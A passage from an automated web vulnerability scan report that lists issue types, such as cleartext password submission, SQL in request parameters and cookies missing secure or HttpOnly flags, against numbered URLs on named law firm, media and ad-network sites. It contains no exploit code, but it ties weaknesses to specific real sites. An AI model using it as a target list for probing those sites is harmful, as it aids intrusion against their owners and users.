4.359. http://www.fulbright.com/index.cfm [Referer HTTP header]

4.360. http://www.kasimer-ittig.com/ [Referer HTTP header]

4.361. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

4.362. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

4.363. http://lt.navegg.com/g.lt [ltcid cookie]

4.364. http://quote.yahoo.com/ [name of an arbitrarily supplied request parameter]

5. Cleartext submission of password

5.1. http://bigbangcafe.net/

5.2. http://dcregistry.com/wbn/welcome.html

5.3. http://dcregistry.com/wbn/welcome.html

5.4. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

5.5. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

5.6. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

5.7. http://www.fulbright.com/

5.8. http://www.fulbright.com/index.cfm

5.9. http://www.fulbright.com/insite

5.10. http://www.fulbright.com/insite

5.11. http://www.local.com/results.aspx

5.12. http://www.political.cov.com/

5.13. http://www.skadden.com/alumni/Index.cfm

5.14. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.15. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.16. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.17. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.18. http://www.vault.com/wps/portal/usa/rankings/individual

5.19. http://www.vault.com/wps/portal/usa/rankings/individual

5.20. http://www.vault.com/wps/portal/usa/rankings/individual

6. SQL statement in request parameter

7. SSL cookie without secure flag set

7.1. https://alumni.hhlaw.com/pages/Framework.aspx

7.2. https://ams-legal.net/mlalaw/default.asp

7.3. https://socialize.gigya.com/gs/bookmark.aspx

7.4. https://socialize.gigya.com/socialize.login

7.5. https://google.com/accounts/Logout

7.6. https://login.yahoo.com/config/login

7.7. https://m.facebook.com/logout.php

8. Session token in URL

9. Password field submitted using GET method

9.1. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

9.2. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

9.3. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

9.4. http://www.local.com/results.aspx

9.5. http://www.vault.com/wps/portal/usa/rankings/individual

10. ASP.NET ViewState without MAC enabled

10.1. http://join.kazaa.com/promotions/signup.aspx

10.2. http://www.cov.com/

10.3. http://www.cov.com/en-US/regions/middle_east/

10.4. http://www.cov.com/favicon.ico

10.5. http://www.cov.com/health_care/health_care_reform/

10.6. http://www.cov.com/industry/financial_services/dodd_frank/

10.7. http://www.cov.com/ja-JP/practice/region.aspx

10.8. http://www.cov.com/ko-KR/practice/region.aspx

10.9. http://www.cov.com/news/detail.aspx

10.10. http://www.cov.com/practice/

10.11. http://www.cov.com/zh-CN/practice/region.aspx

11. Cookie scoped to parent domain

11.1. http://collect.myspace.com/index.cfm

11.2. http://wsdsapi.infospace.com/infomaster/widgets

11.3. http://www.childrenslawcenter.org/

11.4. http://www.directstartv.com/

11.5. http://www.fulbright.com/dc

11.6. http://www.opensource.org/licenses

11.7. http://www.opensource.org/licenses/gpl-license.php

11.8. http://www.opensource.org/licenses/lgpl-license.php

11.9. http://www.opensource.org/licenses/mit-license.php

11.10. http://www.tower.com/in-ring-trials-washington-lawyer-robert-s-bennett-hardcover/wapi/107129050/x26amp

11.11. http://www.tripadvisor.com/ShowUserReviews-g28970-d564552-m10805-r17552300-National_Law_Enforcement_Officers_Memorial-Washington_DC_District_of_Columbia.html/x26amp

11.12. http://ad.doubleclick.net/click

11.13. http://ad.doubleclick.net/clk

11.14. http://ad.doubleclick.net/jump/N4789.Vault/B4885532

11.15. http://adclick.g.doubleclick.net/aclk

11.16. http://ads.adbrite.com/adserver/behavioral-data/8201

11.17. http://ads.revsci.net/adserver/ako

11.18. http://ads.specificmedia.com/click/v=5

11.19. http://ads.specificmedia.com/serve/v=5

11.20. https://adwords.google.com/select/Login

11.21. http://afe.specificclick.net/

11.22. http://att.my.yahoo.com/

11.23. http://b.scorecardresearch.com/b

11.24. http://books.google.com/books

11.25. http://br.search.yahoo.com/search

11.26. http://REDACTED.com/go/284152846/direct

11.27. http://code.google.com/p/swfobject/

11.28. http://d.p-td.com/r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID

11.29. http://d.turn.com/r/dm/mkt/4/mpid//mpuid/4044268024581976328/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D4044268024581976328

11.30. http://d7.zedo.com/OzoDB/cutils/R52_5/jsc/933/egc.js

11.31. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

11.32. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

11.33. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

11.34. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

11.35. http://d7.zedo.com/img/bh.gif

11.36. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json

11.37. http://groups.google.com/groups

11.38. http://ib.adnxs.com/seg

11.39. http://info.intelli-direct.com/e/t3.dll

11.40. http://js.revsci.net/gateway/gw.js

11.41. http://landesm.gfi.com/event-log-analysis-sm/

11.42. http://loadus.exelator.com/load/

11.43. http://local.yahoo.com/DC/Washington/Legal+Financial+Services/Law+Firms/All+Law+Firms/x22

11.44. http://local.yahoo.com/DC/Washington/Legal+Financial+Services/Law+Firms/x26amp

11.45. http://local.yahoo.com/DC/Washington/Legal+Financial+Services/x26amp

11.46. https://login.yahoo.com/config/login

11.47. http://lt.navegg.com/g.lt

11.48. https://m.facebook.com/logout.php

11.49. http://maps.google.com/maps

11.50. http://maps.google.com/maps/place

11.51. http://metric.yellowpages.com/b/ss/yellowpagesglobal/1/H.10-Pdvu-2/s92262714172247

11.52. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s99132242002524

11.53. http://oasc10006.247realmedia.com/RealMedia/ads/adstream_mjx.ads/vault.com/index/1784840526@Top,Middle,Bottom,Middle1,Middle2,x01

11.54. http://pbid.pro-market.net/engine

11.55. http://picasaweb.google.com/lh/view

11.56. http://pix04.revsci.net/D08734/a1/0/0/0.gif

11.57. http://pix04.revsci.net/K08784/b3/0/3/1003161/700404383.js

11.58. http://pixel.quantserve.com/pixel

11.59. http://rafael.lima.myopenid.com/

11.60. http://rafael.lima.myopenid.com/xrds

11.61. http://scholar.google.com/scholar

11.62. http://segment-pixel.invitemedia.com/pixel

11.63. http://sync.mathtag.com/sync/img

11.64. http://syndication.mmismm.com/tntwo.php

11.65. http://tags.bluekai.com/site/1407

11.66. http://tags.bluekai.com/site/2800

11.67. http://tags.bluekai.com/site/2831

11.68. http://tags.bluekai.com/site/2893

11.69. http://tags.bluekai.com/site/2948

11.70. http://tags.bluekai.com/site/857

11.71. http://track.searchignite.com/si/cm/tracking/clickredirect.aspx

11.72. http://translate.google.com/translate_t

11.73. http://travel.yahoo.com/p-travelguide-2818610-national_law_enforcement_officers_memorial_district_of_columbia-i/x26amp

11.74. http://www.att.com/

11.75. http://www.facebook.com/%s

11.76. http://www.facebook.com/profile.php

11.77. http://www.facebook.com/yp

11.78. http://www.flickr.com/photos/darkstream/

11.79. http://www.flickr.com/photos/plutor/1818329845/

11.80. http://www.fulbright.com/Austin

11.81. http://www.fulbright.com/Denver

11.82. http://www.fulbright.com/London

11.83. http://www.fulbright.com/LosAngeles

11.84. http://www.fulbright.com/Minneapolis

11.85. http://www.fulbright.com/Riyadh

11.86. http://www.fulbright.com/aboutus

11.87. http://www.fulbright.com/alumni

11.88. http://www.fulbright.com/aop

11.89. http://www.fulbright.com/careers

11.90. http://www.fulbright.com/dc/x22

11.91. http://www.fulbright.com/downloads

11.92. http://www.fulbright.com/dubai

11.93. http://www.fulbright.com/favicon.ico

11.94. http://www.fulbright.com/index.cfm

11.95. http://www.fulbright.com/industries

11.96. http://www.fulbright.com/insite

11.97. http://www.fulbright.com/international

11.98. http://www.fulbright.com/jblount

11.99. http://www.fulbright.com/news/act_ticker_xml.cfm

11.100. http://www.fulbright.com/newsTicker.swf

11.101. http://www.fulbright.com/offices

11.102. http://www.fulbright.com/rss

11.103. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

11.104. http://www.fulbright.com/technology

11.105. http://www.info.com/washington%20dc%20law%20firms

11.106. http://www.local.com/results.aspx

11.107. http://www.matneylawfirm.com/

11.108. http://www.naegele.com/

11.109. http://www.yellowpages.com/Washington-DC/Attorneys

12. Cookie without HttpOnly flag set

12.1. https://ams-legal.net/mlalaw/default.asp

12.2. http://collect.myspace.com/index.cfm

12.3. http://connectto.mckennalong.com/

12.4. http://hostnet.com.br/

12.5. http://interface.eyecon.ro/

12.6. http://kasimer-ittig.com/

12.7. http://kasimer-ittig.com/&hl=en&client=ca-dp-sphere-radlinks_js&gl=US

12.8. http://kasimer-ittig.com/&hl=en&client=ca-dp-sphere_related_xml&gl=US

12.9. http://local.ingenio.com/

12.10. http://plugins.jquery.com/node/1208]

12.11. http://plugins.jquery.com/project/onImagesLoad

12.12. http://scr.im/rafaelp

12.13. http://sonspring.com/journal/clearing-floats

12.14. http://tbe.taleo.net/NA3/ats/careers/jobSearch.jsp

12.15. http://twitter.com/account/resend_password

12.16. http://twitter.com/arsolto/statuses/10125064363

12.17. http://twitter.com/fagiani

12.18. http://twitter.com/rafaelp

12.19. http://twitter.com/share

12.20. http://viniciusbraga.com/

12.21. http://web2.domainmall.com/domainserve/domainView

12.22. http://wsdsapi.infospace.com/infomaster/widgets

12.23. http://www.abelsonlaw.com/

12.24. http://www.arnoldporter.com/

12.25. http://www.bailyes.com/x22

12.26. http://www.bauerlaw.net/

12.27. http://www.childrenslawcenter.org/

12.28. http://www.dcbar.org/

12.29. http://www.dcchamber.org/chamber/memberDetail.asp

12.30. http://www.dexknows.com/rd/index.asp

12.31. http://www.directstartv.com/

12.32. http://www.dykema.com/

12.33. http://www.ebglaw.com/showoffice.aspx

12.34. http://www.farberlegal.com/

12.35. http://www.fulbright.com/

12.36. http://www.fulbright.com/dc

12.37. http://www.fulbright.com/index.cfm

12.38. http://www.jackscamp.com/

12.39. http://www.kasimer-ittig.com/

12.40. http://www.llsdc.org/

12.41. http://www.llsdc.org/

12.42. http://www.morganlewis.com/

12.43. http://www.nleomf.org/x22

12.44. http://www.nylontechnology.com/

12.45. http://www.opensource.org/licenses

12.46. http://www.opensource.org/licenses/gpl-license.php

12.47. http://www.opensource.org/licenses/lgpl-license.php

12.48. http://www.opensource.org/licenses/mit-license.php

12.49. http://www.political.cov.com/

12.50. http://www.tatebywater.com/

12.51. http://www.tower.com/in-ring-trials-washington-lawyer-robert-s-bennett-hardcover/wapi/107129050/x26amp

12.52. http://www.tripadvisor.com/ShowUserReviews-g28970-d564552-m10805-r17552300-National_Law_Enforcement_Officers_Memorial-Washington_DC_District_of_Columbia.html/x26amp

12.53. http://www.unica.com/

12.54. http://www.vault.com/wps/portal/usa/rankings/individual

12.55. http://www.wglaw.com/

12.56. http://www.wileyrein.com/

12.57. http://www.winstead.com/

12.58. http://ad.doubleclick.net/click

12.59. http://ad.doubleclick.net/clk

12.60. http://ad.doubleclick.net/jump/N4789.Vault/B4885532

12.61. http://ad.yieldmanager.com/iframe3

12.62. http://ad.yieldmanager.com/pixel

12.63. http://adclick.g.doubleclick.net/aclk

12.64. http://ads.adbrite.com/adserver/behavioral-data/8201

12.65. http://ads.myfreecomm.com.br/delivery/ajs.php

12.66. http://ads.myfreecomm.com.br/delivery/lg.php

12.67. http://ads.revsci.net/adserver/ako

12.68. http://ads.roiserver.com/cf

12.69. http://ads.roiserver.com/click

12.70. http://ads.specificmedia.com/click/v=5

12.71. http://ads.specificmedia.com/serve/v=5

12.72. https://adwords.google.com/select/Login

12.73. http://afe.specificclick.net/

12.74. http://att.my.yahoo.com/

12.75. http://b.scorecardresearch.com/b

12.76. http://books.google.com/books

12.77. http://br.search.yahoo.com/search

12.78. http://c.ypcdn.com/2/p/webyp

12.79. http://REDACTED.com/go/284152846/direct

12.80. http://code.google.com/p/swfobject/

12.81. http://contact.collinscollege.edu/college-degrees.aspx

12.82. http://d.p-td.com/r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID

12.83. http://d.turn.com/r/dm/mkt/4/mpid//mpuid/4044268024581976328/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D4044268024581976328

12.84. http://d7.zedo.com/OzoDB/cutils/R52_5/jsc/933/egc.js

12.85. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

12.86. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

12.87. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

12.88. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

12.89. http://d7.zedo.com/img/bh.gif

12.90. http://divorcenet.com/dc/tgc-home.html

12.91. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json

12.92. http://go.sp-ask.com/us/r5

12.93. https://google.com/accounts/Logout

12.94. http://goto.ext.google.com/og-dogfood-issue

12.95. http://goto.ext.google.com/og-exp

12.96. http://groups.google.com/groups

12.97. http://guru.sitescout.com/click

12.98. http://hoganlovellswc.staged.hubbardone.com/files/Uploads/Images/Lock%20Image%20square.JPG

12.99. http://info.intelli-direct.com/e/t3.dll

12.100. http://jonesdaydiversity.com/

12.101. http://jonesdaydiversity.com/404.aspx

12.102. http://jonesdaydiversity.com/favicon.ico

12.103. http://jonesdayv2wc.staged.hubbardone.com/newsknowledge/newsdetail.aspx

12.104. http://js.revsci.net/gateway/gw.js

12.105. http://kevin.lexblog.com/2011/01/articles/legal-news-lexblogosphere/best-in-law-blogs-the-lexblog-network-january-5-2010/

12.106. http://kevin.lexblog.com/2011/01/articles/legal-news-lexblogosphere/best-in-law-blogs-the-lexblog-network-january-5-2011/

12.107. http://landesm.gfi.com/event-log-analysis-sm/

12.108. http://loadus.exelator.com/load/

12.109. http://local.yahoo.com/DC/Washington/Legal+Financial+Services/Law+Firms/All+Law+Firms/x22

12.110. http://local.yahoo.com/DC/Washington/Legal+Financial+Services/Law+Firms/x26amp

12.111. http://local.yahoo.com/DC/Washington/Legal+Financial+Services/x26amp

12.112. https://login.yahoo.com/config/login

12.113. http://lt.navegg.com/g.lt

12.114. https://m.facebook.com/logout.php

12.115. http://maps.google.com/maps

12.116. http://maps.google.com/maps/place

12.117. http://metric.yellowpages.com/b/ss/yellowpagesglobal/1/H.10-Pdvu-2/s92262714172247

12.118. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s99132242002524

12.119. http://mochibot.com/mochiSWF

12.120. http://oasc10006.247realmedia.com/RealMedia/ads/

12.121. http://oasc10006.247realmedia.com/RealMedia/ads/adstream_mjx.ads/vault.com/index/1488314048@Top,Middle,Bottom,Middle1,Middle2,x01

12.122. http://oasc10006.247realmedia.com/RealMedia/ads/adstream_mjx.ads/vault.com/index/1784840526@Top,Middle,Bottom,Middle1,Middle2,x01

12.123. http://oasc10006.247realmedia.com/RealMedia/ads/adstream_mjx.ads/vault.com/index/1905705208@Top,Middle,Bottom,Middle1,Middle2,x01

12.124. http://oasc10006.247realmedia.com/RealMedia/ads/adstream_mjx.ads/vault.com/login/forgot/1919391660@Top,Middle,Bottom,Middle1,Middle2,x01

12.125. http://oasc10006.247realmedia.com/RealMedia/ads/adstream_mjx.ads/vault.com/rankings/0/363/2/1623326908@Top,Middle,Bottom,Middle1,Middle2,x01

12.126. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/1203426004/Middle1/default/empty.gif/7263485738303033424c73414270536c

12.127. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/1265637725/Middle1/default/empty.gif/7263485738303033424c73414270536c

12.128. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/1499175543/Middle2/default/empty.gif/7263485738303033424c73414270536c

12.129. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/1573042006/x01/default/empty.gif/7263485738303033424c73414270536c

12.130. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/1981525601/x01/default/empty.gif/7263485738303033424c73414270536c

12.131. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/393766051/Middle2/default/empty.gif/7263485738303033424c73414270536c

12.132. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/47984070/Middle2/default/empty.gif/7263485738303033424c73414270536c

12.133. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/740464964/Middle1/default/empty.gif/7263485738303033424c73414270536c

12.134. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/846056433/x01/default/empty.gif/7263485738303033424c73414270536c

12.135. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/1028530683/Middle/Vault20/Capgemini_V_SuccessEquation_090710/Capgemini_300x250_ad_5sec.gif/7263485738303033424c73414270536c

12.136. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/1298248331/Top/Vault20/MorrisonFo_V_Various_090910/08_09_Vault_LEADER_728x90.gif/7263485738303033424c73414270536c

12.137. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/1434550647/Middle/Vault20/Capgemini_V_SuccessEquation_090710/Capgemini_300x250_ad_5sec.gif/7263485738303033424c73414270536c

12.138. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/1539380947/Bottom/Vault20/Orrick_V_GrowWithO_082010/16018_vault_728x90_v3.gif/7263485738303033424c73414270536c

12.139. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/2006356102/Bottom/Vault20/Freshfields_V_Succeed_082410/Freshfields_CI_Succeed_082410_728x90T10927114.html/7263485738303033424c73414270536c

12.140. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/2130056760/Middle/Vault20/Capgemini_V_SuccessEquation_090710/Capgemini_300x250_ad_5sec.gif/7263485738303033424c73414270536c

12.141. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/363266666/Bottom/Vault20/Orrick_V_GrowWithO_082010/16018_vault_728x90_v3.gif/7263485738303033424c73414270536c

12.142. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/849894637/Top/Vault20/MorrisonFo_V_Various_090910/08_09_Vault_LEADER_728x90.gif/7263485738303033424c73414270536c

12.143. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/index/L-15/917548902/Top/Vault20/MorrisonFo_V_Various_090910/08_09_Vault_LEADER_728x90.gif/7263485738303033424c73414270536c

12.144. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/login/forgot/1384392152/Bottom/default/empty.gif/7263485738303033424c73414270536c

12.145. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/login/forgot/1491672067/x01/default/empty.gif/7263485738303033424c73414270536c

12.146. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/login/forgot/579703156/Middle1/default/empty.gif/7263485738303033424c73414270536c

12.147. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/login/forgot/811320592/Middle2/default/empty.gif/7263485738303033424c73414270536c

12.148. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/login/forgot/906495160/Top/default/empty.gif/7263485738303033424c73414270536c

12.149. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/login/forgot/L9/998343728/Middle/Vault20/Verizon_V_CampusTour_102710/Verizon_V_CampusTour_102710_300x250M.html/7263485738303033424c73414270536c

12.150. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/rankings/0/363/2/1647341012/Middle2/default/empty.gif/7263485738303033424c73414270536c

12.151. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/rankings/0/363/2/2010963725/x01/default/empty.gif/7263485738303033424c73414270536c

12.152. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/rankings/0/363/2/233716947/Middle1/default/empty.gif/7263485738303033424c73414270536c

12.153. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/rankings/0/363/2/L9/1145927286/Bottom/Vault20/MayerBrown_V_Thrive_090910/Mayer-Brown-Banner_lmnv4.gif/7263485738303033424c73414270536c

12.154. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/rankings/0/363/2/L9/1186229088/Middle/Vault20/Freshfields_V_Succeed_082410/Freshfields_CI_Succeed_082410_300x250M.html/7263485738303033424c73414270536c

12.155. http://oasc10006.247realmedia.com/RealMedia/ads/click_lx.ads/vault.com/rankings/0/363/2/L9/180193437/Top/Vault20/MorrisonFo_V_Various_090910/08_09_Vault_LEAP_728x90.gif/7263485738303033424c73414270536c

12.156. http://pbid.pro-market.net/engine

12.157. http://phpjs.org/functions/parse_url

12.158. http://pix04.revsci.net/D08734/a1/0/0/0.gif

12.159. http://pix04.revsci.net/K08784/b3/0/3/1003161/700404383.js

12.160. http://pixel.quantserve.com/pixel

12.161. http://rafael.lima.myopenid.com/

12.162. http://rafael.lima.myopenid.com/xrds

12.163. http://scholar.google.com/scholar

12.164. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

12.165. http://segment-pixel.invitemedia.com/pixel

12.166. http://skaddenpractices.skadden.com/fca/

12.167. http://skaddenpractices.skadden.com/hc/

12.168. http://skaddenpractices.skadden.com/sec/

12.169. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

12.170. http://sync.mathtag.com/sync/img

12.171. http://syndication.mmismm.com/tntwo.php

12.172. http://tags.bluekai.com/site/1407

12.173. http://tags.bluekai.com/site/2800

12.174. http://tags.bluekai.com/site/2831

12.175. http://tags.bluekai.com/site/2893

12.176. http://tags.bluekai.com/site/2948

12.177. http://tags.bluekai.com/site/857

12.178. http://track.quibids.com/tracking202/redirect/dl.php

12.179. http://track.searchignite.com/si/cm/tracking/clickredirect.aspx

12.180. http://translate.google.com/translate_t

12.181. http://translate.googleapis.com/translate_a/t

12.182. http://travel.yahoo.com/p-travelguide-2818610-national_law_enforcement_officers_memorial_district_of_columbia-i/x26amp

12.183. http://tweetmeme.com/story/1997142500/

12.184. http://tweetmeme.com/story/3323687074/

12.185. http://tweetmeme.com/story/372638150/

12.186. http://tweetmeme.com/story/684823667/

12.187. http://tweetmeme.com/story/768338008/

12.188. http://vault.com/wps/portal/usa/education/reviewcollection

12.189. http://wstat.wibiya.com/l.jpg

12.190. http://www.addthis.com/bookmark.php

12.191. http://www.akingump.com/

12.192. http://www.ashcraftandgerel.com/

12.193. http://www.att.com/

12.194. http://www.att.com/gen/privacy-policy

12.195. http://www.caplindrysdale.com/

12.196. http://www.cov.com/

12.197. http://www.cov.com/en-US/regions/middle_east/

12.198. http://www.cov.com/favicon.ico

12.199. http://www.cov.com/health_care/health_care_reform/

12.200. http://www.cov.com/industry/financial_services/dodd_frank/

12.201. http://www.cov.com/ja-JP/practice/region.aspx

12.202. http://www.cov.com/ko-KR/practice/region.aspx

12.203. http://www.cov.com/news/detail.aspx

12.204. http://www.cov.com/practice/

12.205. http://www.cov.com/zh-CN/practice/region.aspx

12.206. http://www.crazyegg.com/check_script

12.207. http://www.dicksteinshapiro.com/x22

12.208. http://www.dlalaw.com/

12.209. http://www.dsmo.com/

12.210. http://www.facebook.com/%s

12.211. http://www.facebook.com/profile.php

12.212. http://www.facebook.com/yp

12.213. http://www.fairfaxlaw.com/

12.214. http://www.filamentgroup.com/

12.215. http://www.filamentgroup.com/lab/retaining_scalable_interfaces_with_pixel_to_em_conversion/

12.216. http://www.flickr.com/photos/darkstream/

12.217. http://www.flickr.com/photos/plutor/1818329845/

12.218. http://www.fulbright.com/Austin

12.219. http://www.fulbright.com/Beijing

12.220. http://www.fulbright.com/Dallas

12.221. http://www.fulbright.com/Denver

12.222. http://www.fulbright.com/FAA_adv

12.223. http://www.fulbright.com/HongKong

12.224. http://www.fulbright.com/London

12.225. http://www.fulbright.com/LosAngeles

12.226. http://www.fulbright.com/Minneapolis

12.227. http://www.fulbright.com/Munich

12.228. http://www.fulbright.com/Riyadh

12.229. http://www.fulbright.com/SanAntonio

12.230. http://www.fulbright.com/StLouis

12.231. http://www.fulbright.com/aboutus

12.232. http://www.fulbright.com/alumni

12.233. http://www.fulbright.com/aop

12.234. http://www.fulbright.com/careers

12.235. http://www.fulbright.com/dc/x22

12.236. http://www.fulbright.com/downloads

12.237. http://www.fulbright.com/dubai

12.238. http://www.fulbright.com/favicon.ico

12.239. http://www.fulbright.com/houston

12.240. http://www.fulbright.com/industries

12.241. http://www.fulbright.com/insite

12.242. http://www.fulbright.com/international

12.243. http://www.fulbright.com/jblount

12.244. http://www.fulbright.com/languages

12.245. http://www.fulbright.com/news/act_ticker_xml.cfm

12.246. http://www.fulbright.com/newsTicker.swf

12.247. http://www.fulbright.com/newyork

12.248. http://www.fulbright.com/offices

12.249. http://www.fulbright.com/rss

12.250. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

12.251. http://www.fulbright.com/technology

12.252. http://www.haledorr.com/

12.253. http://www.hhlaw.com/

12.254. http://www.hldataprotection.com/

12.255. http://www.hoganlovells.com/

12.256. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/

12.257. http://www.hoganlovells.com/FCWSite/HoganHartsonWS/HHWebServices.asmx

12.258. http://www.hoganlovells.com/FCWSite/Include/AttorneyTypeAhead.js

12.259. http://www.hoganlovells.com/FCWSite/Include/careers.css

12.260. http://www.hoganlovells.com/FCWSite/Include/incFlashDetect.js

12.261. http://www.hoganlovells.com/FCWSite/Include/jquery-1.3.2.min.js

12.262. http://www.hoganlovells.com/FCWSite/Include/jquery-ui-1.7.2.min.js

12.263. http://www.hoganlovells.com/FCWSite/Include/jquery-ui-datepicker.min.js

12.264. http://www.hoganlovells.com/FCWSite/Include/menu/fr/mouseover.js

12.265. http://www.hoganlovells.com/FCWSite/Include/menu/ja/mouseover.js

12.266. http://www.hoganlovells.com/FCWSite/Include/menu/mouseover.js

12.267. http://www.hoganlovells.com/FCWSite/Include/menu/zh/mouseover.js

12.268. http://www.hoganlovells.com/FCWSite/Include/merger/AC_RunActiveContent.js

12.269. http://www.hoganlovells.com/FCWSite/Include/merger/BrowserSpecifics.js

12.270. http://www.hoganlovells.com/FCWSite/Include/merger/general.css

12.271. http://www.hoganlovells.com/FCWSite/Include/merger/home.css

12.272. http://www.hoganlovells.com/FCWSite/Include/merger/menu.css

12.273. http://www.hoganlovells.com/FCWSite/Include/merger/print.css

12.274. http://www.hoganlovells.com/FCWSite/Include/spamproof.js

12.275. http://www.hoganlovells.com/WebResource.axd

12.276. http://www.hoganlovells.com/aboutus/history/

12.277. http://www.hoganlovells.com/aboutus/overview/

12.278. http://www.hoganlovells.com/de/

12.279. http://www.hoganlovells.com/es/

12.280. http://www.hoganlovells.com/fr/

12.281. http://www.hoganlovells.com/include/hoganConfig.xml

12.282. http://www.hoganlovells.com/include_common/NetInsight/ntpagetag.js

12.283. http://www.hoganlovells.com/include_common/YUI/colorpicker-min.js

12.284. http://www.hoganlovells.com/include_common/YUI/container-min.js

12.285. http://www.hoganlovells.com/include_common/YUI/slider-min.js

12.286. http://www.hoganlovells.com/include_common/YUI/utilities.js

12.287. http://www.hoganlovells.com/include_common/tool-man/tool-man-min.js

12.288. http://www.hoganlovells.com/industries/

12.289. http://www.hoganlovells.com/ja/

12.290. http://www.hoganlovells.com/newsmedia/awardsrankings/

12.291. http://www.hoganlovells.com/newsmedia/fastfacts/

12.292. http://www.hoganlovells.com/newsmedia/newspubs/

12.293. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx

12.294. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

12.295. http://www.hoganlovells.com/newsmedia/timeline/

12.296. http://www.hoganlovells.com/offices/

12.297. http://www.hoganlovells.com/ourpeople/

